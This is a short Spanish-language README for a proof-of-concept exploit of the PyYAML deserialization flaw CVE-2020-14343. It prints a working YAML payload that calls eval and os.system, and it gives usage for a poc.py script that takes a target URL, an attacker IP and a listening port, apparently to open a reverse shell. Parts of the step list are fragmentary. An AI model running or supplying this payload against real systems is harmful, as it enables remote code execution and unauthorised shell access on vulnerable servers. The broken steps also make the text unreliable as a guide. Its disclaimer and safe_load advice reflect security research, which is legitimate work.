
Payload de CVE-2020-14343
| Campo | Información |
|---|---|
| ID de CVE | CVE-2020-14343 |
| Componente afectado | PyYAML < 5.4 |
| Tipo de vulnerabilidad | Ejecución remota de código por deserialización (RCE) |
| Nivel de riesgo | Alto |
Cuando PyYAML utiliza yaml.load() para analizar datos no confiables, no restringe las etiquetas YAML peligrosas (como !!python/object). Un atacante puede construir contenido YAML malicioso para ejecutar código arbitrario de Python.
Núcleo del payload:
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('command')"]
python poc.py <目标URL> <攻击者IP> <监听端口>
Ejemplo:
python poc.py http://vulnerable-site.com 192.168.1.100 4444
/upload del objetivo./login para cargar y analizar el YAML.pip install requests
⚠️ ¡Esta herramienta es exclusivamente para investigación de seguridad y pruebas autorizadas!
yaml.safe_load() en lugar de yaml.load().